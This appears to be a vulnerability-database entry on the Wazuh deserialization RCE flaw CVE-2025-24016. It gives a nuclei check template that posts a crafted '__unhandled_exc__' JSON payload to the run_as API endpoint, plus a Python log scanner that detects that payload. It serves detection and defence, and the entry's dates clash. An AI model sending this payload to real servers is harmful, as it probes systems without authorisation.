Wazuh - Unsafe Deserialization Remote Code Execution

Reported: 03 Jul 2026 13:39:16
Reported by: ProjectDiscovery
Type: nuclei
Source: github.com
Views: 93

Critical Remote Code Execution vulnerability in Wazuh server due to unsafe deserialization in API.

Code
id: CVE-2025-24016

info:
  name: Wazuh - Unsafe Deserialization Remote Code Execution
  author: Hüseyin TINTAŞ,ritikchaddha
  severity: critical
  description: |
    A critical Remote Code Execution (RCE) vulnerability exists in Wazuh server versions >= 4.4.0 and < 4.9.1. The vulnerability occurs due to unsafe deserialization in the wazuh-manager package, specifically in the DistributedAPI where parameters are serialized as JSON and deserialized using as_wazuh_object in the framework/wazuh/core/cluster/common.py file. An attacker with API access can exploit this vulnerability by injecting an unsanitized dictionary into DAPI requests, leading to arbitrary Python code execution.
  impact: |
    Successful exploitation allows attackers to execute arbitrary code on the Wazuh server with the privileges of the wazuh-manager process. This can lead to complete system compromise, data exfiltration, lateral movement within the network, and potential denial of service conditions.
  remediation: |
    Upgrade to Wazuh version >= 4.9.1 where this vulnerability has been patched. If immediate upgrade is not possible: Restrict API access to trusted IP addresses only, implement network segmentation to isolate Wazuh servers, monitor for suspicious API requests to the /security/user/authenticate/run_as endpoint, and consider implementing a Web Application Firewall (WAF) to filter malicious requests.
  reference:
    - https://github.com/MuhammadWaseem29/CVE-2025-24016
    - https://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh
    - https://nvd.nist.gov/vuln/detail/CVE-2025-24016
  classification:
    epss-score: 0.92579
    epss-percentile: 0.99814
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.9
    cve-id: CVE-2025-24016
    cwe-id: CWE-502
    cpe: cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: wazuh
    product: wazuh
    shodan-query: title:"Wazuh"
    fofa-query: app="Wazuh"
  tags: cve,cve2025,wazuh,deserialization,rce,authenticated,kev,vkev,vuln

flow: http(1) && http(2)

variables:
  payload: '{"__unhandled_exc__":{"__class__": "NotARealClass", "__args__": []}}'

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "NameError"
        negative: true
        internal: true

  - raw:
      - |
        POST /security/user/authenticate/run_as HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Authorization: Basic {{base64(username + ':' + password)}}

        {{payload}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "NameError"

      - type: status
        status:
          - 500
# digest: 4b0a00483046022100d4e57457296c5d16df655cc0470076811726cd8aa99c26c464ea33cb0d10c9ee022100dd484bca54bed26460ea6bd5005bcf3d1650700f90ecef73822d543a49b2ec04:922c64590222798bb761d5b6d8e72950
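As an added example (not part of the nuclei template or of the Wazuh project), the following Python implements the monitoring the remediation note recommends: it scans API access-log records for POSTs to the run_as endpoint whose JSON body carries the `__unhandled_exc__` marker at any nesting depth, and reports the client, status and claimed class name. The log layout, client IPs and class names are constructed for this example; adapt `LOG_RE` to the real API log format before use.

```python
# Added example (not from the template or the Wazuh project): flag API requests
# whose JSON body carries the __unhandled_exc__ marker on the run_as endpoint.
import json
import re

RUN_AS_PATH = "/security/user/authenticate/run_as"  # endpoint named in the template
MARKER_KEY = "__unhandled_exc__"                     # key that reaches as_wazuh_object

# Assumed log layout (constructed for this example; adapt to your real API log):
# <timestamp> <client-ip> <method> <path> <status> <json-body or ->
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<ip>\S+) (?P<method>[A-Z]+) (?P<path>\S+) "
                    r"(?P<status>\d{3}) (?P<body>.*)$")

# Constructed sample: a top-level probe, a legitimate run_as call, an unrelated
# request, and a probe nested deeper inside the body.
SAMPLE_LOG = """\
2026-02-04T07:00:01Z 10.0.0.5 POST /security/user/authenticate/run_as 500 {"__unhandled_exc__":{"__class__": "NotARealClass", "__args__": []}}
2026-02-04T07:00:02Z 10.0.0.8 POST /security/user/authenticate/run_as 200 {"user_name":"analyst"}
2026-02-04T07:00:03Z 10.0.0.9 GET /agents 200 -
2026-02-04T07:00:04Z 10.0.0.7 POST /security/user/authenticate/run_as 403 {"user_name":"x","ctx":{"__unhandled_exc__":{"__class__":"StillNotAClass","__args__":["a"]}}}
"""

def find_marked_dicts(obj, path=""):
    """Yield (json_path, class_name) for every __unhandled_exc__ dict at any depth."""
    if isinstance(obj, dict):
        marked = obj.get(MARKER_KEY)
        if isinstance(marked, dict):
            yield (f"{path}.{MARKER_KEY}" if path else MARKER_KEY), str(marked.get("__class__"))
        for key, value in obj.items():
            yield from find_marked_dicts(value, f"{path}.{key}" if path else key)
    elif isinstance(obj, list):
        for i, value in enumerate(obj):
            yield from find_marked_dicts(value, f"{path}[{i}]")

def scan_log(text):
    """Return one finding per marker found in a POST body sent to the run_as endpoint."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or m["path"] != RUN_AS_PATH or m["body"] == "-":
            continue
        try:
            body = json.loads(m["body"])
        except json.JSONDecodeError:
            continue  # not a JSON body, so not this pattern
        for json_path, cls in find_marked_dicts(body):
            findings.append({"ip": m["ip"], "status": int(m["status"]),
                             "json_path": json_path, "class": cls})
    return findings
```

`scan_log(SAMPLE_LOG)` returns two findings: the top-level probe from 10.0.0.5 (status 500, as the template's matcher expects on an unpatched server) and the nested one from 10.0.0.7; the legitimate run_as call and the unrelated GET are not reported.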


Current (04 Feb 2026 07:00)
Vulners AI Score: 7.7 (High risk)
CVSS 3.1: 9.9
EPSS: 0.92579